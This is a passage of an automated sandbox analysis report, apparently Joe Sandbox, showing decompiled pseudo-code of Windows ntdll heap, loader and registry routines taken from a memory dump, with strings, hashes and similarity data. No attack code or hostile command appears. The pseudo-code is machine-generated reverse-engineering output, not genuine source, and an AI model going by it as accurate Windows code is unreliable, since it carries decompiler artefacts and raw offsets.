                                                                                                										__eflags =  *(_t103 + 0x240) & 0x00000001;
                                                                                                										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                                                                                                											__eflags = E06E37D50();
                                                                                                											if(__eflags != 0) {
                                                                                                												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                                                												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                                                											}
                                                                                                											E06ED1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                                                                                                										}
                                                                                                									}
                                                                                                									_t133 = 0x7ffe038a;
                                                                                                									_t105 =  *( *[fs:0x30] + 0x50);
                                                                                                									__eflags = _t105;
                                                                                                									if(_t105 != 0) {
                                                                                                										__eflags =  *_t105;
                                                                                                										if( *_t105 == 0) {
                                                                                                											goto L16;
                                                                                                										}
                                                                                                										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                                                										goto L17;
                                                                                                									} else {
                                                                                                										L16:
                                                                                                										_t106 = _t133;
                                                                                                										L17:
                                                                                                										__eflags =  *_t106;
                                                                                                										if( *_t106 != 0) {
                                                                                                											__eflags = E06E37D50();
                                                                                                											if(__eflags != 0) {
                                                                                                												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                                                												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                                                											}
                                                                                                											E06ED1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                                                                                                										}
                                                                                                										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                                                                                                										_t150[1] = _t75;
                                                                                                										goto L4;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							L10:
                                                                                                							_t97 = _t132;
                                                                                                							goto L11;
                                                                                                						}
                                                                                                					} else {
                                                                                                						goto L4;
                                                                                                					}
                                                                                                				}
                                                                                                			}























                                                                                                Strings
                                                                                                • HEAP: , xrefs: 06E8A0BA
                                                                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 06E8A0CD
                                                                                                • HEAP[%wZ]: , xrefs: 06E8A0AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                • API String ID: 0-1340214556
                                                                                                • Opcode ID: 00cdb1094afd36f43e2a82b3daa55a4f67be46dd6d4bb3298de3e255952e70f5
                                                                                                • Instruction ID: 08063866be498d4ffefd8c7d109cfcbf23a65f1921319411ee304f7758a7729d
                                                                                                • Opcode Fuzzy Hash: 00cdb1094afd36f43e2a82b3daa55a4f67be46dd6d4bb3298de3e255952e70f5
                                                                                                • Instruction Fuzzy Hash: BD811131640784EFE7A6DB7CD884BAAB7F8EF04328F0411B5E9558B692D734E940CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 74%
                                                                                                			E06E3B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                                                                                                				signed int _v8;
                                                                                                				char _v12;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __ebp;
                                                                                                				void* _t72;
                                                                                                				char _t76;
                                                                                                				signed char _t77;
                                                                                                				intOrPtr* _t80;
                                                                                                				unsigned int _t85;
                                                                                                				signed int* _t86;
                                                                                                				signed int _t88;
                                                                                                				signed char _t89;
                                                                                                				intOrPtr _t90;
                                                                                                				intOrPtr _t101;
                                                                                                				intOrPtr* _t111;
                                                                                                				void* _t117;
                                                                                                				intOrPtr* _t118;
                                                                                                				signed int _t120;
                                                                                                				signed char _t121;
                                                                                                				intOrPtr* _t123;
                                                                                                				signed int _t126;
                                                                                                				intOrPtr _t136;
                                                                                                				signed int _t139;
                                                                                                				void* _t140;
                                                                                                				signed int _t141;
                                                                                                				void* _t147;
                                                                                                
                                                                                                				_t111 = _a4;
                                                                                                				_t140 = __ecx;
                                                                                                				_v8 = __edx;
                                                                                                				_t3 = _t111 + 0x18; // 0x0
                                                                                                				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                                                                                                				_t5 = _t111 - 8; // -32
                                                                                                				_t141 = _t5;
                                                                                                				 *(_t111 + 0x14) = _a8;
                                                                                                				_t72 = 4;
                                                                                                				 *(_t141 + 2) = 1;
                                                                                                				 *_t141 = _t72;
                                                                                                				 *((char*)(_t141 + 7)) = 3;
                                                                                                				_t134 =  *((intOrPtr*)(__edx + 0x18));
                                                                                                				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                                                                                                					_t76 = (_t141 - __edx >> 0x10) + 1;
                                                                                                					_v12 = _t76;
                                                                                                					__eflags = _t76 - 0xfe;
                                                                                                					if(_t76 >= 0xfe) {
                                                                                                						_push(__edx);
                                                                                                						_push(0);
                                                                                                						E06EDA80D(_t134, 3, _t141, __edx);
                                                                                                						_t76 = _v12;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t76 = 0;
                                                                                                				}
                                                                                                				 *((char*)(_t141 + 6)) = _t76;
                                                                                                				if( *0x6f08748 >= 1) {
                                                                                                					__eflags = _a12 - _t141;
                                                                                                					if(_a12 <= _t141) {
                                                                                                						goto L4;
                                                                                                					}
                                                                                                					_t101 =  *[fs:0x30];
                                                                                                					__eflags =  *(_t101 + 0xc);
                                                                                                					if( *(_t101 + 0xc) == 0) {
                                                                                                						_push("HEAP: ");
                                                                                                						E06E1B150();
                                                                                                					} else {
                                                                                                						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                					}
                                                                                                					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                                                                                                					E06E1B150();
                                                                                                					__eflags =  *0x6f07bc8;
                                                                                                					if(__eflags == 0) {
                                                                                                						E06ED2073(_t111, 1, _t140, __eflags);
                                                                                                					}
                                                                                                					goto L3;
                                                                                                				} else {
                                                                                                					L3:
                                                                                                					_t147 = _a12 - _t141;
                                                                                                					L4:
                                                                                                					if(_t147 != 0) {
                                                                                                						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                                                                                                					}
                                                                                                					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                                                                                                						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                                                                                                						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                                                                                                					}
                                                                                                					_t135 =  *(_t111 + 0x14);
                                                                                                					if( *(_t111 + 0x14) == 0) {
                                                                                                						L12:
                                                                                                						_t77 =  *((intOrPtr*)(_t141 + 6));
                                                                                                						if(_t77 != 0) {
                                                                                                							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                						} else {
                                                                                                							_t117 = _t140;
                                                                                                						}
                                                                                                						_t118 = _t117 + 0x38;
                                                                                                						_t26 = _t111 + 8; // -16
                                                                                                						_t80 = _t26;
                                                                                                						_t136 =  *_t118;
                                                                                                						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                                                                                                							_push(_t118);
                                                                                                							_push(0);
                                                                                                							E06EDA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                                                                                                						} else {
                                                                                                							 *_t80 = _t136;
                                                                                                							 *((intOrPtr*)(_t80 + 4)) = _t118;
                                                                                                							 *((intOrPtr*)(_t136 + 4)) = _t80;
                                                                                                							 *_t118 = _t80;
                                                                                                						}
                                                                                                						_t120 = _v8;
                                                                                                						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                                                                                                						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                                                                                                						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                                                                                                						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                                                                                                						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                                                                                                							__eflags =  *(_t140 + 0xb8);
                                                                                                							if( *(_t140 + 0xb8) == 0) {
                                                                                                								_t88 =  *(_t140 + 0x40) & 0x00000003;
                                                                                                								__eflags = _t88 - 2;
                                                                                                								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                                                                                                								__eflags =  *0x6f08720 & 0x00000001;
                                                                                                								_t89 = _t88 & 0xffffff00 | ( *0x6f08720 & 0x00000001) == 0x00000000;
                                                                                                								__eflags = _t89 & _t121;
                                                                                                								if((_t89 & _t121) != 0) {
                                                                                                									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						_t85 =  *(_t111 + 0x14);
                                                                                                						if(_t85 >= 0x7f000) {
                                                                                                							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                                                                                                						}
                                                                                                						_t86 = _a16;
                                                                                                						 *_t86 = _t141 - _a12 >> 3;
                                                                                                						return _t86;
                                                                                                					} else {
                                                                                                						_t90 = E06E3B8E4(_t135);
                                                                                                						_t123 =  *((intOrPtr*)(_t90 + 4));
                                                                                                						if( *_t123 != _t90) {
                                                                                                							_push(_t123);
                                                                                                							_push( *_t123);
                                                                                                							E06EDA80D(0, 0xd, _t90, 0);
                                                                                                						} else {
                                                                                                							 *_t111 = _t90;
                                                                                                							 *((intOrPtr*)(_t111 + 4)) = _t123;
                                                                                                							 *_t123 = _t111;
                                                                                                							 *((intOrPtr*)(_t90 + 4)) = _t111;
                                                                                                						}
                                                                                                						_t139 =  *(_t140 + 0xb8);
                                                                                                						if(_t139 != 0) {
                                                                                                							_t93 =  *(_t111 + 0x14) >> 0xc;
                                                                                                							__eflags = _t93;
                                                                                                							while(1) {
                                                                                                								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                                                                                                								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                                                                                                									break;
                                                                                                								}
                                                                                                								_t126 =  *_t139;
                                                                                                								__eflags = _t126;
                                                                                                								if(_t126 != 0) {
                                                                                                									_t139 = _t126;
                                                                                                									continue;
                                                                                                								}
                                                                                                								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                                                                								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                                                                								break;
                                                                                                							}
                                                                                                							E06E3E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                                                                                                						}
                                                                                                						goto L12;
                                                                                                					}
                                                                                                				}
                                                                                                			}


                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-1334570610
                                                                                                • Opcode ID: 6525e9a82dda0388193d8ae9b45da7de64e9c3f342fa427cdec7f013e222b1cf
                                                                                                • Instruction ID: 2c1c0b161aa85ae2b5933bd3559b041fd066402f9db6d95c7467ff52970a85bb
                                                                                                • Opcode Fuzzy Hash: 6525e9a82dda0388193d8ae9b45da7de64e9c3f342fa427cdec7f013e222b1cf
                                                                                                • Instruction Fuzzy Hash: 4061F470A10355DFEB98DF24C849BAABBE5FF54304F14956EE85A8F281D730E881CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 98%
                                                                                                			E06E27E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                				char _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				char _v24;
                                                                                                				signed int _t73;
                                                                                                				void* _t77;
                                                                                                				char* _t82;
                                                                                                				char* _t87;
                                                                                                				signed char* _t97;
                                                                                                				signed char _t102;
                                                                                                				intOrPtr _t107;
                                                                                                				signed char* _t108;
                                                                                                				intOrPtr _t112;
                                                                                                				intOrPtr _t124;
                                                                                                				intOrPtr _t125;
                                                                                                				intOrPtr _t126;
                                                                                                
                                                                                                				_t107 = __edx;
                                                                                                				_v12 = __ecx;
                                                                                                				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                                				_t124 = 0;
                                                                                                				_v20 = __edx;
                                                                                                				if(E06E2CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                                                					_t112 = _v8;
                                                                                                				} else {
                                                                                                					_t112 = 0;
                                                                                                					_v8 = 0;
                                                                                                				}
                                                                                                				if(_t112 != 0) {
                                                                                                					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                                                						_t124 = 0xc000007b;
                                                                                                						goto L8;
                                                                                                					}
                                                                                                					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                                                					 *(_t125 + 0x34) = _t73;
                                                                                                					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                                                						goto L3;
                                                                                                					}
                                                                                                					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                                                					_t124 = E06E1C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                                                					if(_t124 < 0) {
                                                                                                						goto L8;
                                                                                                					} else {
                                                                                                						goto L3;
                                                                                                					}
                                                                                                				} else {
                                                                                                					L3:
                                                                                                					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                                                						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                                                						L8:
                                                                                                						return _t124;
                                                                                                					}
                                                                                                					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                                                						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                                                							goto L5;
                                                                                                						}
                                                                                                						_t102 =  *0x6f05780; // 0x0
                                                                                                						if((_t102 & 0x00000003) != 0) {
                                                                                                							E06E95510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                                                							_t102 =  *0x6f05780; // 0x0
                                                                                                						}
                                                                                                						if((_t102 & 0x00000010) != 0) {
                                                                                                							asm("int3");
                                                                                                						}
                                                                                                						_t124 = 0xc0000428;
                                                                                                						goto L8;
                                                                                                					}
                                                                                                					L5:
                                                                                                					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                                                						goto L8;
                                                                                                					}
                                                                                                					_t77 = _a4 - 0x40000003;
                                                                                                					if(_t77 == 0 || _t77 == 0x33) {
                                                                                                						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                						if(E06E37D50() != 0) {
                                                                                                							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                						} else {
                                                                                                							_t82 = 0x7ffe0384;
                                                                                                						}
                                                                                                						_t108 = 0x7ffe0385;
                                                                                                						if( *_t82 != 0) {
                                                                                                							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                                								if(E06E37D50() == 0) {
                                                                                                									_t97 = 0x7ffe0385;
                                                                                                								} else {
                                                                                                									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                								}
                                                                                                								if(( *_t97 & 0x00000020) != 0) {
                                                                                                									E06E97016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						if(_a4 != 0x40000003) {
                                                                                                							L14:
                                                                                                							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                							if(E06E37D50() != 0) {
                                                                                                								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                							} else {
                                                                                                								_t87 = 0x7ffe0384;
                                                                                                							}
                                                                                                							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                                								if(E06E37D50() != 0) {
                                                                                                									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                								}
                                                                                                								if(( *_t108 & 0x00000020) != 0) {
                                                                                                									E06E97016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                								}
                                                                                                							}
                                                                                                							goto L8;
                                                                                                						} else {
                                                                                                							_v16 = _t125 + 0x24;
                                                                                                							_t124 = E06E4A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                                                							if(_t124 < 0) {
                                                                                                								E06E1B1E1(_t124, 0x1490, 0, _v16);
                                                                                                								goto L8;
                                                                                                							}
                                                                                                							goto L14;
                                                                                                						}
                                                                                                					} else {
                                                                                                						goto L8;
                                                                                                					}
                                                                                                				}
                                                                                                			}





















                                                                                                Strings
                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 06E79891
                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 06E798A2
                                                                                                • LdrpCompleteMapModule, xrefs: 06E79898
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                • API String ID: 0-1676968949
                                                                                                • Opcode ID: 4248de6e4d137a860977397a47fd909f3937c225d496e0b81b3b3964800d7249
                                                                                                • Instruction ID: 418026e0cfcfba0ecc31e26968e13f4d3ecfe97e33422931902e3ce25830e8ca
                                                                                                • Opcode Fuzzy Hash: 4248de6e4d137a860977397a47fd909f3937c225d496e0b81b3b3964800d7249
                                                                                                • Instruction Fuzzy Hash: E2510531A047569FFFA1CB58C944BAA7BE5BF01318F142559E9629B3E1D730ED00CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 64%
                                                                                                			E06EC23E3(signed int __ecx, unsigned int __edx) {
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _t42;
                                                                                                				char _t43;
                                                                                                				signed short _t44;
                                                                                                				signed short _t48;
                                                                                                				signed char _t51;
                                                                                                				signed short _t52;
                                                                                                				intOrPtr _t54;
                                                                                                				signed short _t64;
                                                                                                				signed short _t66;
                                                                                                				intOrPtr _t69;
                                                                                                				signed short _t73;
                                                                                                				signed short _t76;
                                                                                                				signed short _t77;
                                                                                                				signed short _t79;
                                                                                                				void* _t83;
                                                                                                				signed int _t84;
                                                                                                				signed int _t85;
                                                                                                				signed char _t94;
                                                                                                				unsigned int _t99;
                                                                                                				unsigned int _t104;
                                                                                                				signed int _t108;
                                                                                                				void* _t110;
                                                                                                				void* _t111;
                                                                                                				unsigned int _t114;
                                                                                                
                                                                                                				_t84 = __ecx;
                                                                                                				_push(__ecx);
                                                                                                				_t114 = __edx;
                                                                                                				_t42 =  *((intOrPtr*)(__edx + 7));
                                                                                                				if(_t42 == 1) {
                                                                                                					L49:
                                                                                                					_t43 = 1;
                                                                                                					L50:
                                                                                                					return _t43;
                                                                                                				}
                                                                                                				if(_t42 != 4) {
                                                                                                					if(_t42 >= 0) {
                                                                                                						if( *(__ecx + 0x4c) == 0) {
                                                                                                							_t44 =  *__edx & 0x0000ffff;
                                                                                                						} else {
                                                                                                							_t73 =  *__edx;
                                                                                                							if(( *(__ecx + 0x4c) & _t73) != 0) {
                                                                                                								_t73 = _t73 ^  *(__ecx + 0x50);
                                                                                                							}
                                                                                                							_t44 = _t73 & 0x0000ffff;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x6f0874c ^ __ecx;
                                                                                                						if(_t104 == 0) {
                                                                                                							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                                                                                                						} else {
                                                                                                							_t76 = 0;
                                                                                                						}
                                                                                                						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                                                                                                					}
                                                                                                					_t94 =  *((intOrPtr*)(_t114 + 7));
                                                                                                					_t108 = _t44 & 0xffff;
                                                                                                					if(_t94 != 5) {
                                                                                                						if((_t94 & 0x00000040) == 0) {
                                                                                                							if((_t94 & 0x0000003f) == 0x3f) {
                                                                                                								if(_t94 >= 0) {
                                                                                                									if( *(_t84 + 0x4c) == 0) {
                                                                                                										_t48 =  *_t114 & 0x0000ffff;
                                                                                                									} else {
                                                                                                										_t66 =  *_t114;
                                                                                                										if(( *(_t84 + 0x4c) & _t66) != 0) {
                                                                                                											_t66 = _t66 ^  *(_t84 + 0x50);
                                                                                                										}
                                                                                                										_t48 = _t66 & 0x0000ffff;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x6f0874c ^ _t84;
                                                                                                									if(_t99 == 0) {
                                                                                                										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                                                                                                									} else {
                                                                                                										_t69 = 0;
                                                                                                									}
                                                                                                									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                                                                                                								}
                                                                                                								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                                                                                                							} else {
                                                                                                								_t85 = _t94 & 0x3f;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                                                                                                					}
                                                                                                					_t110 = (_t108 << 3) - _t85;
                                                                                                				} else {
                                                                                                					if( *(__ecx + 0x4c) == 0) {
                                                                                                						_t77 =  *__edx & 0x0000ffff;
                                                                                                					} else {
                                                                                                						_t79 =  *__edx;
                                                                                                						if(( *(__ecx + 0x4c) & _t79) != 0) {
                                                                                                							_t79 = _t79 ^  *(__ecx + 0x50);
                                                                                                						}
                                                                                                						_t77 = _t79 & 0x0000ffff;
                                                                                                					}
                                                                                                					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                                                                                                				}
                                                                                                				_t51 =  *((intOrPtr*)(_t114 + 7));
                                                                                                				if(_t51 != 5) {
                                                                                                					if((_t51 & 0x00000040) == 0) {
                                                                                                						_t52 = 0;
                                                                                                						goto L42;
                                                                                                					}
                                                                                                					_t64 = _t51 & 0x3f;
                                                                                                					goto L38;
                                                                                                				} else {
                                                                                                					_t64 =  *(_t114 + 6) & 0x000000ff;
                                                                                                					L38:
                                                                                                					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                                                                                                					L42:
                                                                                                					_t35 = _t114 + 8; // -16
                                                                                                					_t111 = _t110 + (_t52 & 0x0000ffff);
                                                                                                					_t83 = _t35 + _t111;
                                                                                                					_t54 = E06E6D4F0(_t83, 0x6df6c58, 8);
                                                                                                					_v8 = _t54;
                                                                                                					if(_t54 == 8) {
                                                                                                						goto L49;
                                                                                                					}
                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                						_push("HEAP: ");
                                                                                                						E06E1B150();
                                                                                                					} else {
                                                                                                						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                					}
                                                                                                					_push(_t111);
                                                                                                					_push(_v8 + _t83);
                                                                                                					E06E1B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                                                                                                					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                						 *0x6f06378 = 1;
                                                                                                						asm("int3");
                                                                                                						 *0x6f06378 = 0;
                                                                                                					}
                                                                                                					_t43 = 0;
                                                                                                					goto L50;
                                                                                                				}
                                                                                                			}





























                                                                                                Strings
                                                                                                • HEAP: , xrefs: 06EC255C
                                                                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 06EC256F
                                                                                                • HEAP[%wZ]: , xrefs: 06EC254F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                • API String ID: 0-3815128232
                                                                                                • Opcode ID: ec93b452e3111e36f190a150b79fdd432b9a96882a90326fa3928fb57c2a796c
                                                                                                • Instruction ID: e94ad8f2d6b834ad048ce35a5e3960bbdbdabd0b2c19073bae9ee7adb4717df1
                                                                                                • Opcode Fuzzy Hash: ec93b452e3111e36f190a150b79fdd432b9a96882a90326fa3928fb57c2a796c
                                                                                                • Instruction Fuzzy Hash: 285158346103508FE3F4CF29CA447B273E2FB48668F05585DEAD28B285D235DA47DB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E06E1E620(void* __ecx, short* __edx, short* _a4) {
                                                                                                				char _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				char* _v28;
                                                                                                				char _v32;
                                                                                                				char _v36;
                                                                                                				char _v44;
                                                                                                				signed int _v48;
                                                                                                				intOrPtr _v52;
                                                                                                				void* _v56;
                                                                                                				void* _v60;
                                                                                                				char _v64;
                                                                                                				void* _v68;
                                                                                                				void* _v76;
                                                                                                				void* _v84;
                                                                                                				signed int _t59;
                                                                                                				signed int _t74;
                                                                                                				signed short* _t75;
                                                                                                				signed int _t76;
                                                                                                				signed short* _t78;
                                                                                                				signed int _t83;
                                                                                                				short* _t93;
                                                                                                				signed short* _t94;
                                                                                                				short* _t96;
                                                                                                				void* _t97;
                                                                                                				signed int _t99;
                                                                                                				void* _t101;
                                                                                                				void* _t102;
                                                                                                
                                                                                                				_t80 = __ecx;
                                                                                                				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                                                				_t96 = __edx;
                                                                                                				_v44 = __edx;
                                                                                                				_t78 = 0;
                                                                                                				_v56 = 0;
                                                                                                				if(__ecx == 0 || __edx == 0) {
                                                                                                					L28:
                                                                                                					_t97 = 0xc000000d;
                                                                                                				} else {
                                                                                                					_t93 = _a4;
                                                                                                					if(_t93 == 0) {
                                                                                                						goto L28;
                                                                                                					}
                                                                                                					_t78 = E06E1F358(__ecx, 0xac);
                                                                                                					if(_t78 == 0) {
                                                                                                						_t97 = 0xc0000017;
                                                                                                						L6:
                                                                                                						if(_v56 != 0) {
                                                                                                							_push(_v56);
                                                                                                							E06E595D0();
                                                                                                						}
                                                                                                						if(_t78 != 0) {
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                                                						}
                                                                                                						return _t97;
                                                                                                					}
                                                                                                					E06E5FA60(_t78, 0, 0x158);
                                                                                                					_v48 = _v48 & 0x00000000;
                                                                                                					_t102 = _t101 + 0xc;
                                                                                                					 *_t96 = 0;
                                                                                                					 *_t93 = 0;
                                                                                                					E06E5BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                                                					_v36 = 0x18;
                                                                                                					_v28 =  &_v44;
                                                                                                					_v64 = 0;
                                                                                                					_push( &_v36);
                                                                                                					_push(0x20019);
                                                                                                					_v32 = 0;
                                                                                                					_push( &_v64);
                                                                                                					_v24 = 0x40;
                                                                                                					_v20 = 0;
                                                                                                					_v16 = 0;
                                                                                                					_t97 = E06E59600();
                                                                                                					if(_t97 < 0) {
                                                                                                						goto L6;
                                                                                                					}
                                                                                                					E06E5BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                                                					_push(0);
                                                                                                					_v48 = 4;
